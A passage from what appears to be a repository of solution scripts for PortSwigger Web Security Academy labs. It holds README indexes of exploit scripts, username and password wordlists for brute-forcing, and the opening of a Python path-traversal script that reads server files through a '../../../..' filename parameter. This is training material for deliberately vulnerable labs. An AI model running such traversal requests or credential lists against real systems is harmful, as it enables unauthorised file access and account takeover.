 7 | Lab: [CORS vulnerability with basic origin reflection](https://portswigger.net/web-security/cors/lab-basic-origin-reflection-attack)
 8 | 
 9 | Difficulty: APPRENTICE
10 | 
11 | 
12 | ### [**Script 02**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/CORS/exploit-lab02.py)
13 | 
14 | Lab: [CORS vulnerability with trusted null origin](https://portswigger.net/web-security/cors/lab-null-origin-whitelisted-attack)
15 | 
16 | Difficulty: APPRENTICE
17 | 
18 | 
19 | ### [**Script 03**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/CORS/exploit-lab03.py)
20 | 
21 | Lab: [CORS vulnerability with trusted insecure protocols](https://portswigger.net/web-security/cors/lab-breaking-https-attack)
22 | 
23 | Difficulty: PRACTITIONER
24 | 
25 | 
26 | ### [**Script 04**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/CORS/exploit-lab04.py)
27 | 
28 | Lab: [CORS vulnerability with internal network pivot attack](https://portswigger.net/web-security/cors/lab-internal-network-pivot-attack)
29 | 
30 | Difficulty: EXPERT
31 | 
32 | 


--------------------------------------------------------------------------------
/NoSQL/README.md:
--------------------------------------------------------------------------------
 1 | 
 2 | ## NoSQL
 3 | 
 4 | 
 5 | 
 6 | ### [**Script 01**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/NoSQL/exploit-lab01.py)
 7 | 
 8 | Lab: [Detecting NoSQL injection](https://portswigger.net/web-security/nosql-injection/lab-nosql-injection-detection)
 9 | 
10 | Difficulty: APPRENTICE
11 | 
12 | 
13 | ### [**Script 02**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/NoSQL/exploit-lab02.py)
14 | 
15 | Lab: [Exploiting NoSQL operator injection to bypass authentication](https://portswigger.net/web-security/nosql-injection/lab-nosql-injection-bypass-authentication)
16 | 
17 | Difficulty: APPRENTICE
18 | 
19 | 
20 | ### [**Script 03**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/NoSQL/exploit-lab03.py)
21 | 
22 | Lab: [Exploiting NoSQL injection to extract data](https://portswigger.net/web-security/nosql-injection/lab-nosql-injection-extract-data)
23 | 
24 | Difficulty: PRACTITIONER
25 | 
26 | 
27 | ### [**Script 04**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/NoSQL/exploit-lab04.py)
28 | 
29 | Lab: [Exploiting NoSQL operator injection to extract unknown fields](https://portswigger.net/web-security/nosql-injection/lab-nosql-injection-extract-unknown-fields)
30 | 
31 | Difficulty: PRACTITIONER
32 | 
33 | 


--------------------------------------------------------------------------------
/Authentication/usernames.txt:
--------------------------------------------------------------------------------
  1 | carlos
  2 | root
  3 | admin
  4 | test
  5 | guest
  6 | info
  7 | adm
  8 | mysql
  9 | user
 10 | administrator
 11 | oracle
 12 | ftp
 13 | pi
 14 | puppet
 15 | ansible
 16 | ec2-user
 17 | vagrant
 18 | azureuser
 19 | academico
 20 | acceso
 21 | access
 22 | accounting
 23 | accounts
 24 | acid
 25 | activestat
 26 | ad
 27 | adam
 28 | adkit
 29 | admin
 30 | administracion
 31 | administrador
 32 | administrator
 33 | administrators
 34 | admins
 35 | ads
 36 | adserver
 37 | adsl
 38 | ae
 39 | af
 40 | affiliate
 41 | affiliates
 42 | afiliados
 43 | ag
 44 | agenda
 45 | agent
 46 | ai
 47 | aix
 48 | ajax
 49 | ak
 50 | akamai
 51 | al
 52 | alabama
 53 | alaska
 54 | albuquerque
 55 | alerts
 56 | alpha
 57 | alterwind
 58 | am
 59 | amarillo
 60 | americas
 61 | an
 62 | anaheim
 63 | analyzer
 64 | announce
 65 | announcements
 66 | antivirus
 67 | ao
 68 | ap
 69 | apache
 70 | apollo
 71 | app
 72 | app01
 73 | app1
 74 | apple
 75 | application
 76 | applications
 77 | apps
 78 | appserver
 79 | aq
 80 | ar
 81 | archie
 82 | arcsight
 83 | argentina
 84 | arizona
 85 | arkansas
 86 | arlington
 87 | as
 88 | as400
 89 | asia
 90 | asterix
 91 | at
 92 | athena
 93 | atlanta
 94 | atlas
 95 | att
 96 | au
 97 | auction
 98 | austin
 99 | auth
100 | auto
101 | autodiscover


--------------------------------------------------------------------------------
/Authentication/passwords.txt:
--------------------------------------------------------------------------------
  1 | 123456
  2 | password
  3 | 12345678
  4 | qwerty
  5 | 123456789
  6 | 12345
  7 | 1234
  8 | 111111
  9 | 1234567
 10 | dragon
 11 | 123123
 12 | baseball
 13 | abc123
 14 | football
 15 | monkey
 16 | letmein
 17 | shadow
 18 | master
 19 | 666666
 20 | qwertyuiop
 21 | 123321
 22 | mustang
 23 | 1234567890
 24 | michael
 25 | 654321
 26 | superman
 27 | 1qaz2wsx
 28 | 7777777
 29 | 121212
 30 | 000000
 31 | qazwsx
 32 | 123qwe
 33 | killer
 34 | trustno1
 35 | jordan
 36 | jennifer
 37 | zxcvbnm
 38 | asdfgh
 39 | hunter
 40 | buster
 41 | soccer
 42 | harley
 43 | batman
 44 | andrew
 45 | tigger
 46 | sunshine
 47 | iloveyou
 48 | 2000
 49 | charlie
 50 | robert
 51 | thomas
 52 | hockey
 53 | ranger
 54 | daniel
 55 | starwars
 56 | klaster
 57 | 112233
 58 | george
 59 | computer
 60 | michelle
 61 | jessica
 62 | pepper
 63 | 1111
 64 | zxcvbn
 65 | 555555
 66 | 11111111
 67 | 131313
 68 | freedom
 69 | 777777
 70 | pass
 71 | maggie
 72 | 159753
 73 | aaaaaa
 74 | ginger
 75 | onceuponatime
 76 | princess
 77 | joshua
 78 | cheese
 79 | amanda
 80 | summer
 81 | love
 82 | ashley
 83 | nicole
 84 | chelsea
 85 | biteme
 86 | matthew
 87 | access
 88 | yankees
 89 | 987654321
 90 | dallas
 91 | austin
 92 | thunder
 93 | taylor
 94 | matrix
 95 | mobilemail
 96 | mom
 97 | monitor
 98 | monitoring
 99 | montana
100 | moon
101 | moscow
102 | secret1
103 | 


--------------------------------------------------------------------------------
/GraphQL/README.md:
--------------------------------------------------------------------------------
 1 | 
 2 | ## GraphQL
 3 | 
 4 | 
 5 | ### [**Script 01**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/GraphQL/exploit-lab01.py)
 6 | 
 7 | Lab: [Accessing private GraphQL posts](https://portswigger.net/web-security/graphql/lab-graphql-reading-private-posts)
 8 | 
 9 | Difficulty: APPRENTICE
10 | 
11 | 
12 | ### [**Script 02**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/GraphQL/exploit-lab02.py)
13 | 
14 | Lab: [Accidental exposure of private GraphQL fields](https://portswigger.net/web-security/graphql/lab-graphql-accidental-field-exposure)
15 | 
16 | Difficulty: PRACTITIONER
17 | 
18 | 
19 | ### [**Script 03**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/GraphQL/exploit-lab03.py)
20 | 
21 | Lab: [Finding a hidden GraphQL endpoint](https://portswigger.net/web-security/graphql/lab-graphql-find-the-endpoint)
22 | 
23 | Difficulty: PRACTITIONER
24 | 
25 | 
26 | ### [**Script 04**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/GraphQL/exploit-lab04.py)
27 | 
28 | Lab: [Bypassing GraphQL brute force protections](https://portswigger.net/web-security/graphql/lab-graphql-brute-force-protection-bypass)
29 | 
30 | Difficulty: PRACTITIONER
31 | 
32 | 
33 | ### [**Script 05**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/GraphQL/exploit-lab05.py)
34 | 
35 | Lab: [Performing CSRF exploits over GraphQL](https://portswigger.net/web-security/graphql/lab-graphql-csrf-via-graphql-api)
36 | 
37 | Difficulty: PRACTITIONER
38 | 


--------------------------------------------------------------------------------
/ClickJacking/README.md:
--------------------------------------------------------------------------------
 1 | 
 2 | ## ClickJacking
 3 | 
 4 | 
 5 | ### [**Script 01**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/ClickJacking/exploit-lab01.py)
 6 | 
 7 | Lab: [Basic clickjacking with CSRF token protection](https://portswigger.net/web-security/clickjacking/lab-basic-csrf-protected)
 8 | 
 9 | Difficulty: APPRENTICE
10 | 
11 | 
12 | ### [**Script 02**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/ClickJacking/exploit-lab02.py)
13 | 
14 | Lab: [Clickjacking with form input data prefilled from a URL parameter](https://portswigger.net/web-security/clickjacking/lab-prefilled-form-input)
15 | 
16 | Difficulty: APPRENTICE
17 | 
18 | 
19 | ### [**Script 03**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/ClickJacking/exploit-lab03.py)
20 | 
21 | Lab: [Clickjacking with a frame buster script](https://portswigger.net/web-security/clickjacking/lab-frame-buster-script)
22 | 
23 | Difficulty: APPRENTICE
24 | 
25 | 
26 | ### [**Script 04**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/CSRF/exploit-lab04.py)
27 | 
28 | Lab: [Exploiting clickjacking vulnerability to trigger DOM-based XSS](https://portswigger.net/web-security/clickjacking/lab-exploiting-to-trigger-dom-based-xss)
29 | 
30 | Difficulty: PRACTITIONER
31 | 
32 | ### [**Script 05**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/CSRF/exploit-lab05.py)
33 | 
34 | Lab: [Multistep clickjacking](https://portswigger.net/web-security/clickjacking/lab-multistep)
35 | 
36 | Difficulty: PRACTITIONER
37 | 
38 | 


--------------------------------------------------------------------------------
/OSCommandInjection/README.md:
--------------------------------------------------------------------------------
 1 | 
 2 | ## OS Command Injection
 3 | 
 4 | 
 5 | 
 6 | ### [**Script 01**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/OSCommandInjection/exploit-lab01.py)
 7 | 
 8 | Lab: [OS command injection, simple case](https://portswigger.net/web-security/os-command-injection/lab-simple)
 9 | 
10 | Difficulty: APPRENTICE
11 | 
12 | 
13 | ### [**Script 02**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/OSCommandInjection/exploit-lab02.py)
14 | 
15 | Lab: [Blind OS command injection with time delays](https://portswigger.net/web-security/os-command-injection/lab-blind-time-delays)
16 | 
17 | Difficulty: PRACTITIONER
18 | 
19 | 
20 | ### [**Script 03**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/OSCommandInjection/exploit-lab03.py)
21 | 
22 | Lab: [Blind OS command injection with output redirection](https://portswigger.net/web-security/os-command-injection/lab-blind-output-redirection)
23 | 
24 | Difficulty: PRACTITIONER
25 | 
26 | 
27 | ### [**Script 04**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/OSCommandInjection/exploit-lab04.py)
28 | 
29 | Lab: [Blind OS command injection with out-of-band interaction](https://portswigger.net/web-security/os-command-injection/lab-blind-out-of-band)
30 | 
31 | Difficulty: PRACTITIONER
32 | 
33 | 
34 | ### [**Script 05**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/OSCommandInjection/exploit-lab05.py)
35 | 
36 | Lab: [Blind OS command injection with out-of-band data exfiltration](https://portswigger.net/web-security/os-command-injection/lab-blind-out-of-band-data-exfiltration)
37 | 
38 | Difficulty: PRACTITIONER
39 | 
40 | - Requires Burp Collaborator (BurpSuite Pro)    NOT TESTED <!>
41 | 
42 | 


--------------------------------------------------------------------------------
/InformationDisclosure/README.md:
--------------------------------------------------------------------------------
 1 | 
 2 | ## Information Disclosure
 3 | 
 4 | 
 5 | ### [**Script 01**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/InformationDisclosure/exploit-lab01.py)
 6 | 
 7 | Lab: [Information disclosure in error messages](https://portswigger.net/web-security/information-disclosure/exploiting/lab-infoleak-in-error-messages)
 8 | 
 9 | Difficulty: APPRENTICE
10 | 
11 | 
12 | ### [**Script 02**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/InformationDisclosure/exploit-lab02.py)
13 | 
14 | Lab: [Information disclosure on debug page](https://portswigger.net/web-security/information-disclosure/exploiting/lab-infoleak-on-debug-page)
15 | 
16 | Difficulty: APPRENTICE
17 | 
18 | 
19 | ### [**Script 03**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/InformationDisclosure/exploit-lab03.py)
20 | 
21 | Lab: [Source code disclosure via backup files](https://portswigger.net/web-security/information-disclosure/exploiting/lab-infoleak-via-backup-files)
22 | 
23 | Difficulty: APPRENTICE
24 | 
25 | 
26 | ### [**Script 04**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/InformationDisclosure/exploit-lab04.py)
27 | 
28 | Lab: [Authentication bypass via information disclosure](https://portswigger.net/web-security/information-disclosure/exploiting/lab-infoleak-authentication-bypass)
29 | 
30 | Difficulty: APPRENTICE
31 | 
32 | 
33 | ### [**Script 05**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/InformationDisclosure/exploit-lab05.py)
34 | 
35 | Lab: [Information disclosure in version control history](https://portswigger.net/web-security/information-disclosure/exploiting/lab-infoleak-in-version-control-history)
36 | 
37 | Difficulty: PRACTITIONER
38 | 
39 | 


--------------------------------------------------------------------------------
/APITesting/README.md:
--------------------------------------------------------------------------------
 1 | 
 2 | ## API testing
 3 | 
 4 | 
 5 | 
 6 | ### [**Script 01**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/APITesting/exploit-lab01.py)
 7 | 
 8 | Lab: [Exploiting an API endpoint using documentation](https://portswigger.net/web-security/api-testing/lab-exploiting-api-endpoint-using-documentation)
 9 | 
10 | Difficulty: APPRENTICE
11 | 
12 | 
13 | ### [**Script 02**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/APITesting/exploit-lab02.py)
14 | 
15 | Lab: [Exploiting server-side parameter pollution in a query string](https://portswigger.net/web-security/api-testing/server-side-parameter-pollution/lab-exploiting-server-side-parameter-pollution-in-query-string)
16 | 
17 | Difficulty: PRACTITIONER
18 | 
19 | 
20 | ### [**Script 03**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/APITesting/exploit-lab03.py)
21 | 
22 | Lab: [Finding and exploiting an unused API endpoint](https://portswigger.net/web-security/api-testing/lab-exploiting-unused-api-endpoint)
23 | 
24 | Difficulty: PRACTITIONER
25 | 
26 | 
27 | ### [**Script 04**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/APITesting/exploit-lab04.py)
28 | 
29 | Lab: [Exploiting a mass assignment vulnerability](https://portswigger.net/web-security/api-testing/lab-exploiting-mass-assignment-vulnerability)
30 | 
31 | Difficulty: PRACTITIONER
32 | 
33 | 
34 | ### [**Script 05**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/APITesting/exploit-lab05.py)
35 | 
36 | Lab: [Exploiting server-side parameter pollution in a REST URL](https://portswigger.net/web-security/api-testing/server-side-parameter-pollution/lab-exploiting-server-side-parameter-pollution-in-rest-url)
37 | 
38 | Difficulty: EXPERT
39 | 
40 | 
41 | 


--------------------------------------------------------------------------------
/OAuth/README.md:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | ## OAuth
 4 | 
 5 | 
 6 | ### [**Script 01**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/OAuth/exploit-lab01.py)
 7 | 
 8 | Lab: [Authentication bypass via OAuth implicit flow](https://portswigger.net/web-security/oauth/lab-oauth-authentication-bypass-via-oauth-implicit-flow)
 9 | 
10 | Difficulty: APPRENTICE
11 | 
12 | 
13 | ### [**Script 02**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/OAuth/exploit-lab02.py)
14 | 
15 | Lab: [Forced OAuth profile linking](https://portswigger.net/web-security/oauth/lab-oauth-forced-oauth-profile-linking)
16 | 
17 | Difficulty: PRACTITIONER
18 | 
19 | 
20 | ### [**Script 03**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/OAuth/exploit-lab03.py)
21 | 
22 | Lab: [OAuth account hijacking via redirect_uri](https://portswigger.net/web-security/oauth/lab-oauth-account-hijacking-via-redirect-uri)
23 | 
24 | Difficulty: PRACTITIONER
25 | 
26 | 
27 | ### [**Script 04**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/OAuth/exploit-lab04.py)
28 | 
29 | Lab: [Stealing OAuth access tokens via an open redirect](https://portswigger.net/web-security/oauth/lab-oauth-stealing-oauth-access-tokens-via-an-open-redirect)
30 | 
31 | Difficulty: PRACTITIONER
32 | 
33 | 
34 | ### [**Script 05**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/OAuth/exploit-lab05.py)
35 | 
36 | Lab: [SSRF via OpenID dynamic client registration](https://portswigger.net/web-security/oauth/openid/lab-oauth-ssrf-via-openid-dynamic-client-registration)
37 | 
38 | Difficulty: PRACTITIONER
39 | 
40 | 
41 | ### [**Script 06**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/OAuth/exploit-lab06.py)
42 | 
43 | Lab: [Stealing OAuth access tokens via a proxy page](https://portswigger.net/web-security/oauth/lab-oauth-stealing-oauth-access-tokens-via-a-proxy-page)
44 | 
45 | Difficulty: EXPERT
46 | 
47 | 


--------------------------------------------------------------------------------
/DirectoryTraversal/README.md:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | ## Directory Traversal
 4 | 
 5 | 
 6 | 
 7 | 
 8 | ### [**Script 01**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/DirectoryTraversal/exploit-lab01.py)
 9 | 
10 | Lab: [File path traversal, simple case](https://portswigger.net/web-security/file-path-traversal/lab-simple)
11 | 
12 | Difficulty: APPRENTICE
13 | 
14 | 
15 | ### [**Script 02**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/DirectoryTraversal/exploit-lab02.py)
16 | 
17 | Lab: [File path traversal, traversal sequences blocked with absolute path bypass](https://portswigger.net/web-security/file-path-traversal/lab-absolute-path-bypass)
18 | 
19 | Difficulty: PRACTITIONER
20 | 
21 | 
22 | ### [**Script 03**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/DirectoryTraversal/exploit-lab03.py)
23 | 
24 | Lab: [File path traversal, traversal sequences stripped non-recursively](https://portswigger.net/web-security/file-path-traversal/lab-sequences-stripped-non-recursively)
25 | 
26 | Difficulty: PRACTITIONER
27 | 
28 | 
29 | ### [**Script 04**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/DirectoryTraversal/exploit-lab04.py)
30 | 
31 | Lab: [File path traversal, traversal sequences stripped with superfluous URL-decode](https://portswigger.net/web-security/file-path-traversal/lab-superfluous-url-decode)
32 | 
33 | Difficulty: PRACTITIONER
34 | 
35 | 
36 | ### [**Script 05**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/DirectoryTraversal/exploit-lab05.py)
37 | 
38 | Lab: [File path traversal, validation of start of path](https://portswigger.net/web-security/file-path-traversal/lab-validate-start-of-path)
39 | 
40 | Difficulty: PRACTITIONER
41 | 
42 | 
43 | ### [**Script 06**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/DirectoryTraversal/exploit-lab06.py)
44 | 
45 | Lab: [File path traversal, validation of file extension with null byte bypass](https://portswigger.net/web-security/file-path-traversal/lab-validate-file-extension-null-byte-bypass)
46 | 
47 | Difficulty: PRACTITIONER
48 | 
49 | 
50 | 


--------------------------------------------------------------------------------
/SSRF/README.md:
--------------------------------------------------------------------------------
 1 | 
 2 | ## SSRF
 3 | 
 4 | 
 5 | 
 6 | ### [**Script 01**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/SSRF/exploit-lab01.py)
 7 | 
 8 | Lab: [Basic SSRF against the local server](https://portswigger.net/web-security/ssrf/lab-basic-ssrf-against-localhost)
 9 | 
10 | Difficulty: APPRENTICE
11 | 
12 | 
13 | ### [**Script 02**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/SSRF/exploit-lab02.py)
14 | 
15 | Lab: [Basic SSRF against another back-end system](https://portswigger.net/web-security/ssrf/lab-basic-ssrf-against-backend-system)
16 | 
17 | Difficulty: APPRENTICE
18 | 
19 | ### [**Script 03**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/SSRF/exploit-lab03.py)
20 | 
21 | Lab: [Blind SSRF with out-of-band detection](https://portswigger.net/web-security/ssrf/blind/lab-out-of-band-detection)
22 | 
23 | Difficulty: PRACTITIONER
24 | 
25 | ### [**Script 04**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/SSRF/exploit-lab04.py)
26 | 
27 | Lab: [SSRF with blacklist-based input filter](https://portswigger.net/web-security/ssrf/lab-ssrf-with-blacklist-filter)
28 | 
29 | Difficulty: PRACTITIONER
30 | 
31 | 
32 | ### [**Script 05**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/SSRF/exploit-lab05.py)
33 | 
34 | Lab: [SSRF with filter bypass via open redirection vulnerability](https://portswigger.net/web-security/ssrf/lab-ssrf-filter-bypass-via-open-redirection)
35 | 
36 | Difficulty: PRACTITIONER
37 | 
38 | 
39 | ### [**Script 06**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/SSRF/exploit-lab06.py)
40 | 
41 | Lab: [Blind SSRF with Shellshock exploitation](https://portswigger.net/web-security/ssrf/blind/lab-shellshock-exploitation)
42 | 
43 | Difficulty: EXPERT
44 | 
45 | - Requires Burp Collaborator (BurpSuite Pro)    NOT TESTED <!>
46 | 
47 | 
48 | ### [**Script 07**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/SSRF/exploit-lab07.py)
49 | 
50 | Lab: [SSRF with whitelist-based input filter](https://portswigger.net/web-security/ssrf/lab-ssrf-with-whitelist-filter)
51 | 
52 | Difficulty: EXPERT


--------------------------------------------------------------------------------
/DOMBasedXSS/README.md:
--------------------------------------------------------------------------------
 1 | 
 2 | ## DOM-Based XSS
 3 | 
 4 | 
 5 | ### [**Script 01**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/DOMBasedXSS/exploit-lab01.py)
 6 | 
 7 | Lab: [DOM XSS using web messages](https://portswigger.net/web-security/dom-based/controlling-the-web-message-source/lab-dom-xss-using-web-messages)
 8 | 
 9 | Difficulty: PRACTITIONER
10 | 
11 | 
12 | ### [**Script 02**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/DOMBasedXSS/exploit-lab02.py)
13 | 
14 | Lab: [DOM XSS using web messages and a JavaScript URL](https://portswigger.net/web-security/dom-based/controlling-the-web-message-source/lab-dom-xss-using-web-messages-and-a-javascript-url)
15 | 
16 | Difficulty: PRACTITIONER
17 | 
18 | 
19 | ### [**Script 03**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/DOMBasedXSS/exploit-lab03.py)
20 | 
21 | Lab: [DOM XSS using web messages and JSON.parse](https://portswigger.net/web-security/dom-based/controlling-the-web-message-source/lab-dom-xss-using-web-messages-and-json-parse)
22 | 
23 | Difficulty: PRACTITIONER
24 | 
25 | 
26 | ### [**Script 04**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/DOMBasedXSS/exploit-lab04.py)
27 | 
28 | Lab: [DOM-based open redirection](https://portswigger.net/web-security/dom-based/open-redirection/lab-dom-open-redirection)
29 | 
30 | Difficulty: PRACTITIONER
31 | 
32 | 
33 | ### [**Script 05**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/DOMBasedXSS/exploit-lab05.py)
34 | 
35 | Lab: [DOM-based cookie manipulation](https://portswigger.net/web-security/dom-based/cookie-manipulation/lab-dom-cookie-manipulation)
36 | 
37 | Difficulty: PRACTITIONER
38 | 
39 | 
40 | ### [**Script 06**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/DOMBasedXSS/exploit-lab06.py)
41 | 
42 | Lab: [Exploiting DOM clobbering to enable XSS](https://portswigger.net/web-security/dom-based/dom-clobbering/lab-dom-xss-exploiting-dom-clobbering)
43 | 
44 | Difficulty: EXPERT
45 | 
46 | 
47 | ### [**Script 07**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/DOMBasedXSS/exploit-lab07.py)
48 | 
49 | Lab: [Clobbering DOM attributes to bypass HTML filters](https://portswigger.net/web-security/dom-based/dom-clobbering/lab-dom-clobbering-attributes-to-bypass-html-filters)
50 | 
51 | Difficulty: EXPERT
52 | 
53 | 


--------------------------------------------------------------------------------
/FileUpload/README.md:
--------------------------------------------------------------------------------
 1 | 
 2 | ## File Upload
 3 | 
 4 | 
 5 | ### [**Script 01**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/FileUpload/exploit-lab01.py)
 6 | 
 7 | Lab: [Remote code execution via web shell upload](https://portswigger.net/web-security/file-upload/lab-file-upload-remote-code-execution-via-web-shell-upload)
 8 | 
 9 | Difficulty: APPRENTICE
10 | 
11 | 
12 | ### [**Script 02**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/FileUpload/exploit-lab02.py)
13 | 
14 | Lab: [Web shell upload via Content-Type restriction bypass](https://portswigger.net/web-security/file-upload/lab-file-upload-web-shell-upload-via-content-type-restriction-bypass)
15 | 
16 | Difficulty: APPRENTICE
17 | 
18 | 
19 | ### [**Script 03**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/FileUpload/exploit-lab03.py)
20 | 
21 | Lab: [Web shell upload via path traversal](https://portswigger.net/web-security/file-upload/lab-file-upload-web-shell-upload-via-path-traversal)
22 | 
23 | Difficulty: PRACTITIONER
24 | 
25 | 
26 | ### [**Script 04**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/FileUpload/exploit-lab04.py)
27 | 
28 | Lab: [Web shell upload via extension blacklist bypass](https://portswigger.net/web-security/file-upload/lab-file-upload-web-shell-upload-via-extension-blacklist-bypass)
29 | 
30 | Difficulty: PRACTITIONER
31 | 
32 | 
33 | ### [**Script 05**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/FileUpload/exploit-lab05.py)
34 | 
35 | Lab: [Web shell upload via obfuscated file extension](https://portswigger.net/web-security/file-upload/lab-file-upload-web-shell-upload-via-obfuscated-file-extension)
36 | 
37 | Difficulty: PRACTITIONER
38 | 
39 | 
40 | 
41 | ### [**Script 06**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/FileUpload/exploit-lab06.py)
42 | 
43 | Lab: [Remote code execution via polyglot web shell upload](https://portswigger.net/web-security/file-upload/lab-file-upload-remote-code-execution-via-polyglot-web-shell-upload)
44 | 
45 | Difficulty: PRACTITIONER
46 | 
47 | 
48 | ### [**Script 07**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/FileUpload/exploit-lab07.py)
49 | 
50 | Lab: [Web shell upload via race condition](https://portswigger.net/web-security/file-upload/lab-file-upload-web-shell-upload-via-race-condition)
51 | 
52 | Difficulty: EXPERT
53 | 
54 | 
55 | 


--------------------------------------------------------------------------------
/HostHeader/README.md:
--------------------------------------------------------------------------------
 1 | 
 2 | ## Host Header
 3 | 
 4 | 
 5 | ### [**Script 01**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/BusinessLogic/exploit-lab01.py)
 6 | 
 7 | Lab: [Basic password reset poisoning](https://portswigger.net/web-security/host-header/exploiting/password-reset-poisoning/lab-host-header-basic-password-reset-poisoning)
 8 | 
 9 | Difficulty: APPRENTICE
10 | 
11 | 
12 | ### [**Script 02**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/BusinessLogic/exploit-lab02.py)
13 | 
14 | Lab: [Host header authentication bypass](https://portswigger.net/web-security/host-header/exploiting/lab-host-header-authentication-bypass)
15 | 
16 | Difficulty: APPRENTICE
17 | 
18 | 
19 | ### [**Script 03**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/BusinessLogic/exploit-lab03.py)
20 | 
21 | Lab: [Web cache poisoning via ambiguous requests](https://portswigger.net/web-security/host-header/exploiting/lab-host-header-web-cache-poisoning-via-ambiguous-requests)
22 | 
23 | Difficulty: PRACTITIONER
24 | 
25 | 
26 | ### [**Script 04**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/BusinessLogic/exploit-lab04.py)
27 | 
28 | Lab: [Routing-based SSRF](https://portswigger.net/web-security/host-header/exploiting/lab-host-header-routing-based-ssrf)
29 | 
30 | Difficulty: PRACTITIONER
31 | 
32 | 
33 | ### [**Script 05**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/BusinessLogic/exploit-lab05.py)
34 | 
35 | Lab: [SSRF via flawed request parsing](https://portswigger.net/web-security/host-header/exploiting/lab-host-header-ssrf-via-flawed-request-parsing)
36 | 
37 | Difficulty: PRACTITIONER
38 | 
39 | 
40 | ### [**Script 06**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/BusinessLogic/exploit-lab06.py)
41 | 
42 | Lab: [Host validation bypass via connection state attack](https://portswigger.net/web-security/host-header/exploiting/lab-host-header-host-validation-bypass-via-connection-state-attack)
43 | 
44 | Difficulty: PRACTITIONER
45 | 
46 | 
47 | ### [**Script 07**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/BusinessLogic/exploit-lab07.py)
48 | 
49 | Lab: [Password reset poisoning via dangling markup](https://portswigger.net/web-security/host-header/exploiting/password-reset-poisoning/lab-host-header-password-reset-poisoning-via-dangling-markup)
50 | 
51 | Difficulty: EXPERT
52 | 
53 | 
54 | 


--------------------------------------------------------------------------------
/DirectoryTraversal/exploit-lab01.py:
--------------------------------------------------------------------------------
 1 | # File path traversal, simple case
 2 | 
 3 | # https://portswigger.net/web-security/file-path-traversal/lab-simple
 4 | 
 5 | import sys
 6 | import requests
 7 | import urllib3
 8 | import urllib.parse
 9 | import re
10 | import time
11 | import warnings
12 | import argparse
13 | 
14 | 
15 | warnings.filterwarnings("ignore", category=DeprecationWarning)
16 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
17 | 
18 | proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
19 | 
20 | 
21 | ##########################################################
22 | #	FUNCTIONS
23 | ##########################################################
24 | 
25 | def read_file(s, url, file):
26 | 	file_path = url + '/image?filename=../../../..'
27 | 	print('[+] Trying to read %s on the target server...' % file)
28 | 	print('\n[+] Sending GET request to "%s"' % (file_path + file))
29 | 	r = s.get(file_path + file)
